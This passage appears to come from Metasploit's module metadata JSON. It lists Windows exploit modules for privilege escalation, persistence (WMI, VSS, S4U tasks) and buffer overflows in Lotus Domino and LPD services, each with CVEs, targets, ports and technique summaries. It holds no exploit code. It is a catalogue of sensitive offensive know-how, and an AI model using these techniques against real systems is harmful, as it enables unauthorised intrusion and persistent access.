"/modules/exploits/windows/local/run_as.rb", - "is_install_path": true, - "ref_name": "windows/local/run_as", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/s4u_persistence": { - "name": "Windows Manage User Level Persistent Payload Installer", - "fullname": "exploit/windows/local/s4u_persistence", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-01-02", - "type": "exploit", - "author": [ - "Thomas McCarthy \"smilingraccoon\" ", - "Brandon McCann \"zeknox\" " - ], - "description": "Creates a scheduled task that will run using service-for-user (S4U).\n This allows the scheduled task to run even as an unprivileged user\n that is not logged into the device. This will result in lower security\n context, allowing access to local resources only. The module\n requires 'Logon as a batch job' permissions (SeBatchLogonRight).", - "references": [ - "URL-http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/", - "URL-http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/s4u_persistence.rb", - "is_install_path": true, - "ref_name": "windows/local/s4u_persistence", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/service_permissions": { - "name": "Windows Escalate Service Permissions Local Privilege Escalation", - "fullname": "exploit/windows/local/service_permissions", - "aliases": [], - "rank": 500, - "disclosure_date": "2012-10-15", - "type": "exploit", - "author": [ - "scriptjunkie", - "Spencer McIntyre", - "itm4n" - ], - "description": "This module attempts to exploit existing administrative privileges to obtain\n a SYSTEM session. If directly creating a service fails, this module will inspect\n existing services to look for insecure configuration, file or registry permissions that may\n be hijacked. It will then attempt to restart the replaced service to run the\n payload. This will result in a new session when this succeeds.", - "references": [ - "URL-https://itm4n.github.io/windows-registry-rpceptmapper-eop/", - "URL-https://birkep.github.io/posts/Windows-LPE/", - "CVE-2025-21293" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Exploit CVE-2025-21293" - ], - "mod_time": "2025-04-17 09:43:13 +0000", - "path": "/modules/exploits/windows/local/service_permissions.rb", - "is_install_path": true, - "ref_name": "windows/local/service_permissions", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/srclient_dll_hijacking": { - "name": "Windows Server 2012 SrClient DLL hijacking", - "fullname": "exploit/windows/local/srclient_dll_hijacking", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-02-19", - "type": "exploit", - "author": [ - "Erik Wynter" - ], - "description": "All editions of Windows Server 2012 (but not 2012 R2) are vulnerable to DLL\n hijacking due to the way TiWorker.exe will try to call the non-existent\n `SrClient.dll` file when Windows Update checks for updates. This issue can be\n leveraged for privilege escalation if %PATH% includes directories that are\n writable by low-privileged users. The attack can be triggered by any\n low-privileged user and does not require a system reboot.\n\n This module has been successfully tested on Windows Server 2012 (x64).", - "references": [ - "URL-https://blog.vonahi.io/srclient-dll-hijacking" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Server 2012 (x64)" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/local/srclient_dll_hijacking.rb", - "is_install_path": true, - "ref_name": "windows/local/srclient_dll_hijacking", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs", - "screen-effects" - ], - "Reliability": [ - "unreliable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/tokenmagic": { - "name": "Windows Privilege Escalation via TokenMagic (UAC Bypass)", - "fullname": "exploit/windows/local/tokenmagic", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-05-25", - "type": "exploit", - "author": [ - "James Forshaw", - "Ruben Boonen ( ", - "bwatters-r7", - "jheysel-r7" - ], - "description": "This module leverages a UAC bypass (TokenMagic) in order to spawn a process/conduct a DLL\n hijacking attack to gain SYSTEM-level privileges. Windows 7 through Windows 10 1803\n are affected.", - "references": [ - "URL-https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1", - "URL-https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html", - "URL-https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html", - "URL-https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/tokenmagic.rb", - "is_install_path": true, - "ref_name": "windows/local/tokenmagic", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/unquoted_service_path": { - "name": "Windows Unquoted Service Path Privilege Escalation", - "fullname": "exploit/windows/local/unquoted_service_path", - "aliases": [], - "rank": 500, - "disclosure_date": "2001-10-25", - "type": "exploit", - "author": [ - "sinn3r ", - "h00die" - ], - "description": "This module exploits a logic flaw due to how the lpApplicationName parameter\n is handled. When the lpApplicationName contains a space, the file name is\n ambiguous. Take this file path as example: C:\\program files\\hello.exe;\n The Windows API will try to interpret this as two possible paths:\n C:\\program.exe, and C:\\program files\\hello.exe, and then execute all of them.\n To some software developers, this is an unexpected behavior, which becomes a\n security problem if an attacker is able to place a malicious executable in one\n of these unexpected paths, sometimes escalate privileges if run as SYSTEM.\n Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the\n same problem.\n\n The offensive technique is also described in Writing Secure Code (2nd Edition),\n Chapter 23, in the section \"Calling Processes Security\" on page 676.\n\n This technique was previously called Trusted Service Path, but is more commonly\n known as Unquoted Service Path.\n\n The service exploited won't start until the payload written to disk is removed.", - "references": [ - "URL-http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx", - "URL-http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us", - "URL-https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2025-04-13 16:34:03 +0000", - "path": "/modules/exploits/windows/local/unquoted_service_path.rb", - "is_install_path": true, - "ref_name": "windows/local/unquoted_service_path", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "artifacts-on-disk", - "config-changes" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/virtual_box_guest_additions": { - "name": "VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation", - "fullname": "exploit/windows/local/virtual_box_guest_additions", - "aliases": [], - "rank": 200, - "disclosure_date": "2014-07-15", - "type": "exploit", - "author": [ - "Matt Bergin ", - "Jay Smith " - ], - "description": "A vulnerability within the VBoxGuest driver allows an attacker to inject memory they\n control into an arbitrary location they define. This can be used by an attacker to\n overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\n NtQueryIntervalProfile on Windows XP SP3 systems. This has been tested with VBoxGuest\n Additions up to 4.3.10r93012.", - "references": [ - "CVE-2014-2477", - "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/virtual_box_guest_additions.rb", - "is_install_path": true, - "ref_name": "windows/local/virtual_box_guest_additions", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/virtual_box_opengl_escape": { - "name": "VirtualBox 3D Acceleration Virtual Machine Escape", - "fullname": "exploit/windows/local/virtual_box_opengl_escape", - "aliases": [], - "rank": 200, - "disclosure_date": "2014-03-11", - "type": "exploit", - "author": [ - "Francisco Falcon", - "Florian Ledoux", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The\n vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a\n sequence of specially crafted rendering messages, a virtual machine can exploit an out\n of bounds array access to corrupt memory and escape to the host. This module has been\n tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6.", - "references": [ - "CVE-2014-0983", - "BID-66133", - "URL-http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities", - "URL-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/virtual_box_opengl_escape.rb", - "is_install_path": true, - "ref_name": "windows/local/virtual_box_opengl_escape", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/vss_persistence": { - "name": "Persistent Payload in Windows Volume Shadow Copy", - "fullname": "exploit/windows/local/vss_persistence", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-10-21", - "type": "exploit", - "author": [ - "Jedediah Rodriguez " - ], - "description": "This module will attempt to create a persistent payload in a new volume shadow copy. This is\n based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has\n been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY\n option, the user should need password in order to start session on the target machine.", - "references": [ - "URL-https://web.archive.org/web/20201111212952/https://securityweekly.com/2011/11/02/safely-dumping-hashes-from-liv/", - "URL-http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Windows" - ], - "mod_time": "2022-10-01 17:54:59 +0000", - "path": "/modules/exploits/windows/local/vss_persistence.rb", - "is_install_path": true, - "ref_name": "windows/local/vss_persistence", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "config-changes" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/webexec": { - "name": "WebEx Local Service Permissions Exploit", - "fullname": "exploit/windows/local/webexec", - "aliases": [], - "rank": 400, - "disclosure_date": "2018-10-09", - "type": "exploit", - "author": [ - "Jeff McJunkin " - ], - "description": "This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM,\n can be used to run arbitrary commands locally, and can be started by limited users in\n default installations.", - "references": [ - "URL-https://webexec.org", - "CVE-2018-15442" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows x86", - "Windows x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/local/webexec.rb", - "is_install_path": true, - "ref_name": "windows/local/webexec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/win_error_cve_2023_36874": { - "name": "Microsoft Error Reporting Local Privilege Elevation Vulnerability", - "fullname": "exploit/windows/local/win_error_cve_2023_36874", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-07-11", - "type": "exploit", - "author": [ - "Filip Dragović (Wh04m1001)", - "Octoberfest7", - "bwatters-r7" - ], - "description": "This module takes advantage of a bug in the way Windows error reporting opens the report\n parser. If you open a report, Windows uses a relative path to locate the rendering program.\n By creating a specific alternate directory structure, we can coerce Windows into opening an\n arbitrary executable as SYSTEM.\n If the current user is a local admin, the system will attempt impersonation and the exploit will\n fail.", - "references": [ - "CVE-2023-36874", - "URL-https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/", - "URL-https://github.com/Wh04m1001/CVE-2023-36874", - "URL-https://github.com/Octoberfest7/CVE-2023-36874_BOF" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-09-27 09:43:32 +0000", - "path": "/modules/exploits/windows/local/win_error_cve_2023_36874.rb", - "is_install_path": true, - "ref_name": "windows/local/win_error_cve_2023_36874", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/windscribe_windscribeservice_priv_esc": { - "name": "Windscribe WindscribeService Named Pipe Privilege Escalation", - "fullname": "exploit/windows/local/windscribe_windscribeservice_priv_esc", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-05-24", - "type": "exploit", - "author": [ - "Emin Ghuliev", - "bcoles " - ], - "description": "The Windscribe VPN client application for Windows makes use of a\n Windows service `WindscribeService.exe` which exposes a named pipe\n `\\.\\pipe\\WindscribeService` allowing execution of programs with\n elevated privileges.\n\n Windscribe versions prior to 1.82 do not validate user-supplied\n program names, allowing execution of arbitrary commands as SYSTEM.\n\n This module has been tested successfully on Windscribe versions\n 1.80 and 1.81 on Windows 7 SP1 (x64).", - "references": [ - "CVE-2018-11479", - "URL-http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html", - "URL-https://pastebin.com/eLG3dpYK" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb", - "is_install_path": true, - "ref_name": "windows/local/windscribe_windscribeservice_priv_esc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/wmi": { - "name": "Windows Management Instrumentation (WMI) Remote Command Execution", - "fullname": "exploit/windows/local/wmi", - "aliases": [], - "rank": 600, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "Ben Campbell " - ], - "description": "This module executes powershell on the remote host using the current\n user credentials or those supplied. Instead of using PSEXEC over TCP\n port 445 we use the WMIC command to start a Remote Procedure Call on\n TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel\n traffic through that session.\n\n The result is similar to psexec but with the added benefit of using\n the session's current authentication token instead of having to know\n a password or hash.\n\n The remote host must be configured to allow remote Windows Management\n Instrumentation.", - "references": [ - "CVE-1999-0504", - "OSVDB-3106", - "URL-http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2022-09-23 17:41:20 +0000", - "path": "/modules/exploits/windows/local/wmi.rb", - "is_install_path": true, - "ref_name": "windows/local/wmi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/wmi_persistence": { - "name": "WMI Event Subscription Persistence", - "fullname": "exploit/windows/local/wmi_persistence", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-06-06", - "type": "exploit", - "author": [ - "Nick Tyrer <@NickTyrer>" - ], - "description": "This module will create a permanent WMI event subscription to achieve file-less persistence using one\n of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER\n (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing\n must be enabled on the target for this method to work, this can be enabled using \"auditpol.exe /set /subcategory:Logon\n /failure:Enable\"). When these criteria are met a command line event consumer will trigger an encoded powershell payload.\n The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON\n method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS\n method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method\n creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER\n before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command\n (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is\n activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a\n high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations.", - "references": [ - "URL-https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf", - "URL-https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2024-03-12 12:17:46 +0000", - "path": "/modules/exploits/windows/local/wmi_persistence.rb", - "is_install_path": true, - "ref_name": "windows/local/wmi_persistence", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/lotus/domino_http_accept_language": { - "name": "IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow", - "fullname": "exploit/windows/lotus/domino_http_accept_language", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-05-20", - "type": "exploit", - "author": [ - "Fairuzan Roslan ", - "Earl Marcus klks " - ], - "description": "This module exploits a stack buffer overflow in IBM Lotus Domino Web Server\n prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP\n request with an Accept-Language header greater than 114 bytes.", - "references": [ - "CVE-2008-2240", - "OSVDB-45415", - "BID-29310", - "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21303057" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Lotus Domino 7.0 on Windows 2003 SP1 English(NX)", - "Lotus Domino 7.0 on Windows 2003 SP2 English(NX)", - "Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)", - "Lotus Domino 8.0 on Windows 2003 SP1 English(NX)", - "Lotus Domino 8.0 on Windows 2003 SP2 English(NX)", - "Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lotus/domino_http_accept_language.rb", - "is_install_path": true, - "ref_name": "windows/lotus/domino_http_accept_language", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/lotus/domino_icalendar_organizer": { - "name": "IBM Lotus Domino iCalendar MAILTO Buffer Overflow", - "fullname": "exploit/windows/lotus/domino_icalendar_organizer", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-09-14", - "type": "exploit", - "author": [ - "A. Plaskett", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in IBM Lotus Domino iCalendar. By\n sending a long string of data as the \"ORGANIZER;mailto\" header, process \"nRouter.exe\"\n crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to\n gain arbitrary code execution.\n\n Note: In order to trigger the vulnerable code path, a valid Domino mailbox account\n is needed.", - "references": [ - "CVE-2010-3407", - "OSVDB-68040", - "ZDI-10-177", - "URL-http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/", - "URL-http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Lotus Domino 8.5 on Windows 2000 SP4", - "Lotus Domino 8.5 on Windows Server 2003 SP0", - "Lotus Domino 8.5 on Windows Server 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lotus/domino_icalendar_organizer.rb", - "is_install_path": true, - "ref_name": "windows/lotus/domino_icalendar_organizer", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/lotus/domino_sametime_stmux": { - "name": "IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow", - "fullname": "exploit/windows/lotus/domino_sametime_stmux", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-05-21", - "type": "exploit", - "author": [ - "aushack ", - "riaf " - ], - "description": "This module exploits a stack buffer overflow in Lotus Domino\\'s Sametime\n Server. By sending an overly long POST request to the Multiplexer\n STMux.exe service we are able to overwrite SEH. Based on the exploit\n by Manuel Santamarina Suarez.", - "references": [ - "CVE-2008-2499", - "OSVDB-45610", - "BID-29328", - "ZDI-08-028" - ], - "platform": "Windows", - "arch": "x86", - "rport": 1533, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Lotus Sametime 7.5 on Windows Server 2000 SP4", - "Lotus Sametime 7.5 on Windows Server 2003 SP1", - "Lotus Sametime 7.5 on Windows Server 2003 SP2", - "Lotus Sametime 7.5.1 Windows Server 2003 SP2", - "Lotus Sametime 8.0.0 Windows Server 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lotus/domino_sametime_stmux.rb", - "is_install_path": true, - "ref_name": "windows/lotus/domino_sametime_stmux", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/lotus/lotusnotes_lzh": { - "name": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)", - "fullname": "exploit/windows/lotus/lotusnotes_lzh", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-05-24", - "type": "exploit", - "author": [ - "binaryhouse.net", - "alino <26alino@gmail.com>" - ], - "description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. This vulnerability was\n discovered binaryhouse.net", - "references": [ - "CVE-2011-1213", - "OSVDB-72706", - "BID-48018", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904", - "URL-http://www.ibm.com/support/docview.wss?uid=swg21500034" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": [ - "Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal", - "Lotus Notes 8.5.2 FP2 / Windows Universal / DEP" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lotus/lotusnotes_lzh.rb", - "is_install_path": true, - "ref_name": "windows/lotus/lotusnotes_lzh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/lpd/hummingbird_exceed": { - "name": "Hummingbird Connectivity 10 SP5 LPD Buffer Overflow", - "fullname": "exploit/windows/lpd/hummingbird_exceed", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-05-27", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Hummingbird Connectivity\n 10 LPD Daemon. This module has only been tested against Hummingbird\n Exceed v10 with SP5.", - "references": [ - "CVE-2005-1815", - "OSVDB-16957", - "BID-13788" - ], - "platform": "Windows", - "arch": "", - "rport": 515, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 English SP0-SP4", - "Windows XP English SP0/SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lpd/hummingbird_exceed.rb", - "is_install_path": true, - "ref_name": "windows/lpd/hummingbird_exceed", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/lpd/niprint": { - "name": "NIPrint LPD Request Overflow", - "fullname": "exploit/windows/lpd/niprint", - "aliases": [], - "rank": 400, - "disclosure_date": "2003-11-05", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the\n Network Instrument NIPrint LPD service. Inspired by\n Immunity's VisualSploit :-)", - "references": [ - "CVE-2003-1141", - "OSVDB-2774", - "BID-8968", - "URL-http://www.immunitysec.com/documentation/vs_niprint.html" - ], - "platform": "Windows", - "arch": "", - "rport": 515, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "NIPrint3.EXE (TDS:0x3a045ff2)", - "Windows XP SP3", - "Windows 7 x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lpd/niprint.rb", - "is_install_path": true, - "ref_name": "windows/lpd/niprint", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/lpd/saplpd": { - "name": "SAP SAPLPD 6.28 Buffer Overflow", - "fullname": "exploit/windows/lpd/saplpd", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-02-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40) .\n By sending an overly long argument, an attacker may be able to execute arbitrary\n code.", - "references": [ - "CVE-2008-0621", - "OSVDB-41127", - "BID-27613" - ], - "platform": "Windows", - "arch": "", - "rport": 515, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "SAPlpd 6.28.0.1 (SAP Release 6.40)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lpd/saplpd.rb", - "is_install_path": true, - "ref_name": "windows/lpd/saplpd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/lpd/wincomlpd_admin": { - "name": "WinComLPD Buffer Overflow", - "fullname": "exploit/windows/lpd/wincomlpd_admin", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-02-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in WinComLPD <= 3.0.2.\n By sending an overly long authentication packet to the remote\n administration service, an attacker may be able to execute arbitrary\n code.", - "references": [ - "CVE-2008-5159", - "OSVDB-42861", - "BID-27614" - ], - "platform": "Windows", - "arch": "", - "rport": 13500, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "WinComLPD 3.0.2.623" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lpd/wincomlpd_admin.rb", - "is_install_path": true, - "ref_name": "windows/lpd/wincomlpd_admin", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/achat_bof": { - "name": "Achat Unicode SEH Buffer Overflow", - "fullname": "exploit/windows/misc/achat_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-12-18", - "type": "exploit", - "author": [ - "Peter Kasza ", - "Balazs Bucsay " - ], - "description": "This module exploits a Unicode SEH buffer overflow in Achat. By\n sending a crafted message to the default port 9256/UDP, it's possible to overwrite the\n SEH handler. Even when the exploit is reliable, it depends on timing since there are\n two threads overflowing the stack in the same time. This module has been tested on\n Achat v0.150 running on Windows XP SP3 and Windows 7.", - "references": [ - "CWE-121" - ], - "platform": "Windows", - "arch": "", - "rport": 9256, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/achat_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/achat_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/actfax_raw_server_bof": { - "name": "ActFax 5.01 RAW Server Buffer Overflow", - "fullname": "exploit/windows/misc/actfax_raw_server_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-02-05", - "type": "exploit", - "author": [ - "Craig Freyman", - "corelanc0d3r", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW\n Server can be 